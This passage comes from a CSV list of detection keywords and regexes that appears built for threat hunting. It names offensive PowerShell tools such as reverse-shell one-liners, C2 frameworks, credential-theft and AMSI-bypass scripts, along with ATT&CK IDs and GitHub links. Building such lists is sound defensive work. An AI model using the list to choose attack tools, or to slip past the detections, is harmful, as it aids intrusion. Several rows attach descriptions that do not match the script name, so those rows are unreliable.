Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellTcpOneLine*",".{0,1000}Invoke\-PowerShellTcpOneLine.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellTcpOneLine.ps1*",".{0,1000}Invoke\-PowerShellTcpOneLine\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Invoke-PowerShellTcpOneLine.ps1*",".{0,1000}Invoke\-PowerShellTcpOneLine\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellTcpOneLineBind*",".{0,1000}Invoke\-PowerShellTcpOneLineBind.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellTcpOneLineBind.ps1*",".{0,1000}Invoke\-PowerShellTcpOneLineBind\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowershellTranscriptionCheck*",".{0,1000}Invoke\-PowershellTranscriptionCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-PowerShellUdp*",".{0,1000}Invoke\-PowerShellUdp.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellUdp.ps1*",".{0,1000}Invoke\-PowerShellUdp\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Invoke-PowerShellUdp.ps1*",".{0,1000}Invoke\-PowerShellUdp\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellUdpOneLine*",".{0,1000}Invoke\-PowerShellUdpOneLine.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellUdpOneLine.ps1*",".{0,1000}Invoke\-PowerShellUdpOneLine\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Invoke-PowerShellUdpOneLine.ps1*",".{0,1000}Invoke\-PowerShellUdpOneLine\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellWmi*",".{0,1000}Invoke\-PowerShellWmi.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellWmi.ps1*",".{0,1000}Invoke\-PowerShellWmi\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PowerThIEf*",".{0,1000}Invoke\-PowerThIEf.{0,1000}","offensive_tool_keyword","Invoke-PowerThIEf","An IE Post Exploitation Library released at Steelcon in Sheffield 7th July 2018.","T1027 - T1053 - T1114 - T1059 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/nettitude/Invoke-PowerThIEf","1","0","N/A","N/A","2","129","27","2018-09-12T11:26:06Z","2018-07-10T09:14:58Z" "*Invoke-PowerThIEf*",".{0,1000}Invoke\-PowerThIEf.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-PowerThIEf.ps1*",".{0,1000}Invoke\-PowerThIEf\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-PPLDump*",".{0,1000}Invoke\-PPLDump.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" 
"*Invoke-Prasadhak*",".{0,1000}Invoke\-Prasadhak.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-Prasadhak.ps1*",".{0,1000}Invoke\-Prasadhak\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PrintDemon*",".{0,1000}Invoke\-PrintDemon.{0,1000}","offensive_tool_keyword","Invoke-PrintDemon","This is an PowerShell Empire launcher PoC using PrintDemon and Faxhell. The module has the Faxhell DLL already embedded which leverages CVE-2020-1048 for privilege escalation. 
The vulnerability allows an unprivileged user to gain system-level privileges and is based on @ionescu007 PoC.","T1204 - T1208 - T1216 - T1055 - T1203","TA0001 - TA0007 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY/Invoke-PrintDemon","1","1","N/A","N/A","2","198","42","2020-10-17T17:04:24Z","2020-05-15T05:14:49Z" "*Invoke-PrintNightmareCheck*",".{0,1000}Invoke\-PrintNightmareCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-Privesc*",".{0,1000}Invoke\-Privesc.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","0","N/A","10","5","469","90","2023-03-06T10:27:00Z","2015-11-19T13:22:01Z" "*Invoke-Privesc*",".{0,1000}Invoke\-Privesc.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-PrivescAudit *",".{0,1000}Invoke\-PrivescAudit\s.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" 
"*Invoke-PrivescAudit*",".{0,1000}Invoke\-PrivescAudit.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-PrivescCheck*",".{0,1000}Invoke\-PrivescCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-PrivescCheck*",".{0,1000}Invoke\-PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-PrivescCheck.ps1*",".{0,1000}Invoke\-PrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" 
"*invokeprocesshunter*",".{0,1000}invokeprocesshunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-ProcessHunter*",".{0,1000}Invoke\-ProcessHunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-ProcessHunter*",".{0,1000}Invoke\-ProcessHunter.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*invoke-processhunter*",".{0,1000}invoke\-processhunter.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","9","835","111","2024-04-12T10:12:03Z","2016-07-06T13:25:09Z" "*Invoke-ProcessPunisher*",".{0,1000}Invoke\-ProcessPunisher.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Invoke-ProcessScan*",".{0,1000}Invoke\-ProcessScan.{0,1000}","offensive_tool_keyword","Invoke-ProcessScan","This script uses a list from the Equation Group leak from the shadow brokers to provide context to executeables that are running on a system.","T1059.001 - T1016 - T1547.001","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/vysecurity/Invoke-ProcessScan","1","1","N/A","N/A","1","44","22","2017-06-05T12:19:25Z","2017-06-03T18:36:30Z" "*Invoke-ProcSpawn -Command *",".{0,1000}Invoke\-ProcSpawn\s\-Command\s.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Invoke-ProcSpawn*",".{0,1000}Invoke\-ProcSpawn.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*InvokePS1.bat*",".{0,1000}InvokePS1\.bat.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Invoke-ps2exe*",".{0,1000}Invoke\-ps2exe.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*Invoke-PSAmsiScan*",".{0,1000}Invoke\-PSAmsiScan.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Invoke-PsExec*",".{0,1000}Invoke\-PsExec.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PSexec.ps1*",".{0,1000}Invoke\-PSexec\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-PsExec.ps1*",".{0,1000}Invoke\-PsExec\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1095","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*invoke-psexecpayload*",".{0,1000}invoke\-psexecpayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - 
T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-PsGcat*",".{0,1000}Invoke\-PsGcat.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PSGcat.ps1*",".{0,1000}Invoke\-PSGcat\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PsGcat.ps1*",".{0,1000}Invoke\-PsGcat\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PsGcatAgent*",".{0,1000}Invoke\-PsGcatAgent.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PsGcatAgent.ps1*",".{0,1000}Invoke\-PsGcatAgent\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PSImage*",".{0,1000}Invoke\-PSImage.{0,1000}","offensive_tool_keyword","Invoke-PSImage","Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to executenInvoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file of from the web.","T1027 - T1218 - T1216 - T1059","TA0002 - TA0008 - TA0007","N/A","N/A","Defense Evasion","https://github.com/peewpw/Invoke-PSImage","1","0","N/A","N/A","10","2121","398","2019-09-23T15:17:03Z","2017-12-17T18:41:44Z" "*Invoke-PSInject*",".{0,1000}Invoke\-PSInject.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
